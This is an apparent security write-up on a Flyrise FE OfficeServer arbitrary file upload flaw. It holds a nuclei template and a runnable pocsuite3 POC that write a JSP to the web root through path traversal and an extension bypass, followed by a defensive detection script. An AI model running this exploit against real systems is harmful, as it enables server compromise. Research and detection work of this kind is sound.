Flyrise (飞企互联) file upload vulnerability
Created on: January 13, 2025
```yaml
id: Flyrise-FEM-OfficeServer-upload

info:
  name: 飞企互联-FE业务协作平台 OfficeServer 任意文件上传
  author: SleepingBag945
  severity: critical

variables:
  str1: '{{rand_base(8)}}'

http:
  - raw:
      - |
        POST /iweboffice/OfficeServer.js%70 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ
        OPTION=U0FWRUZJTEU=
        RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
        <%out.println("{{str1}}");%>
      - |
        GET /uid.jsp;.js HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    # Same check as the pocsuite3 POC below: the second response is 200 and echoes the random string
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{str1}}'
      - type: status
        status:
          - 200
```
Below is an example pocsuite3 POC that implements a check for the 飞企互联-FE业务协作平台 OfficeServer arbitrary file upload vulnerability. Note that the `%70` in `OfficeServer.js%70` must be kept exactly as written.

Notes

- This POC is intended only for security research or for use with explicit authorization; never use it for illegal purposes.
- Some fields in the script (author, dates, and so on) can be adjusted to fit your situation.
- On a slow network you may need a longer `sleep` after sending the first request.
```python
#!/usr/bin/env python3
# coding=utf-8
"""
pocsuite3 POC for the 飞企互联-FE业务协作平台 OfficeServer arbitrary file upload vulnerability
"""
import time

from pocsuite3.api import POCBase, Output, register_poc, logger, requests
from pocsuite3.api import POC_CATEGORY
from pocsuite3.lib.utils import random_str


class FlyriseFEMOfficeServerFileUploadPOC(POCBase):
    # Basic vulnerability metadata
    vulID = "Flyrise-FEM-OfficeServer-upload"  # vulnerability id, can be customised
    version = "1.0"
    author = "SleepingBag945"
    vulDate = "2025-01-13"
    createDate = "2025-01-13"
    updateDate = "2025-01-13"
    references = []
    name = "飞企互联-FE业务协作平台 OfficeServer 任意文件上传"
    appPowerLink = ""
    appName = "飞企互联-FE业务协作平台 OfficeServer"
    appVersion = "all"
    vulType = "Arbitrary File Upload"
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    desc = """
    飞企互联-FE业务协作平台 OfficeServer 模块存在任意文件上传漏洞,攻击者可通过特殊构造请求上传恶意文件并导致服务器被入侵。
    """
    pocDesc = """
    1. 发送 POST 请求至 /iweboffice/OfficeServer.js%70,构造特定数据包含恶意代码
    2. 等待几秒后,再访问 /uid.jsp;.js 验证是否执行成功
    """

    def _verify(self):
        result = {}
        base_url = self.url.strip().rstrip("/")

        # Write a random string into the jsp file so the upload can be verified
        str1 = random_str(8)

        # Step 1: build the POST request; the target path contains %70
        post_path = "/iweboffice/OfficeServer.js%70"
        # This mirrors the data layout of the official poc; adjust as needed
        # Note: the <%out.println("...");%> part must be present, otherwise nothing is written
        data = (
            "DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ\n"
            "OPTION=U0FWRUZJTEU=\n"
            "RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw\n"
            f"<%out.println(\"{str1}\");%>"
        )
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,"
                      "image/avif,image/webp,image/apng,*/*;q=0.8",
            "Connection": "close"
        }

        try:
            # Send the file upload request
            upload_url = base_url + post_path
            requests.post(upload_url, data=data, headers=headers, timeout=5, verify=False)

            # Adjust the wait according to network conditions
            time.sleep(3)

            # Step 2: check whether the file was written
            get_path = "/uid.jsp;.js"
            verify_url = base_url + get_path
            r2 = requests.get(verify_url, headers=headers, timeout=5, verify=False)
            if r2.status_code == 200 and str1 in r2.text:
                # Upload succeeded: the random string is readable
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = verify_url
                result["VerifyInfo"]["Data"] = str1
        except Exception as e:
            logger.error(f"Request Error: {e}")

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("Target is not vulnerable")
        return output


# Register the POC
register_poc(FlyriseFEMOfficeServerFileUploadPOC)
```
Save the script as `flyrise_fem_officeserver_upload.py` (any file name will do), then run:

```bash
pocsuite -r flyrise_fem_officeserver_upload.py -u http://target.com --verify
```

A vulnerable target prints the result under `VerifyInfo`; if nothing is output, the target is not vulnerable or the check failed.
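For the defending side, the request above is easy to spot once the DBSTEP fields are decoded: `OPTION` and `RECORDID` are base64, and here they decode to `SAVEFILE` and a traversal path ending in `.jsp`. The following is an added detection example, not part of the original page or the POC; the sample bodies are constructed, and the benign `RECORDID` value `123456` is made up for contrast.

```python
import base64
import re
from typing import Dict, List

# Constructed sample bodies: the first mirrors the DBSTEP layout of the request above,
# the second is a made-up benign SAVEFILE (RECORDID "123456") for contrast.
SAMPLE_BODIES = {
    "malicious": "DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\n"
                 "RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw\n<%out.println(\"x\");%>",
    "benign": "DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ\nOPTION=U0FWRUZJTEU=\n"
              "RECORDID=MTIzNDU2\n<document bytes>",
}
EXEC_EXT = (".jsp", ".jspx")  # extensions the servlet container would execute
FIELD_RE = re.compile(r"\b([A-Z][A-Z0-9_]*)=([A-Za-z0-9+/=]*)")


def _maybe_b64(value: str) -> str:
    """DBSTEP fields are base64; fall back to the raw value if it does not decode cleanly."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return value


def parse_dbstep(body: str) -> Dict[str, str]:
    """Collect KEY=value fields from a DBSTEP body, decoding each value where possible."""
    return {k: _maybe_b64(v) for k, v in FIELD_RE.findall(body)}


def encoded_unreserved(path: str) -> bool:
    """True when the raw request path percent-encodes a letter or digit (e.g. %70 for 'p').
    Such bytes never need encoding, so this usually signals an attempt to dodge an extension check."""
    return any(chr(int(h, 16)).isalnum() for h in re.findall(r"%([0-9A-Fa-f]{2})", path))


def assess_dbstep_upload(body: str) -> dict:
    """Flag a SAVEFILE whose RECORDID walks out of the upload directory or names a JSP."""
    fields = parse_dbstep(body)
    target = fields.get("RECORDID", "")
    parts = target.replace("\\", "/").lower().split("/")
    reasons: List[str] = []
    if fields.get("OPTION", "").upper() == "SAVEFILE":
        if ".." in parts:
            reasons.append("path traversal in RECORDID")
        if parts[-1].endswith(EXEC_EXT):
            reasons.append("server-executable extension in RECORDID")
    return {"option": fields.get("OPTION"), "target": target,
            "reasons": reasons, "suspicious": bool(reasons)}


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, assess_dbstep_upload(body))
    print("js%70 path flagged:", encoded_unreserved("/iweboffice/OfficeServer.js%70"))
```

The same two checks (decoded `RECORDID` containing `..` or ending in a JSP extension, and an encoded letter in the request path) can be wired into a WAF rule or an access-log scan.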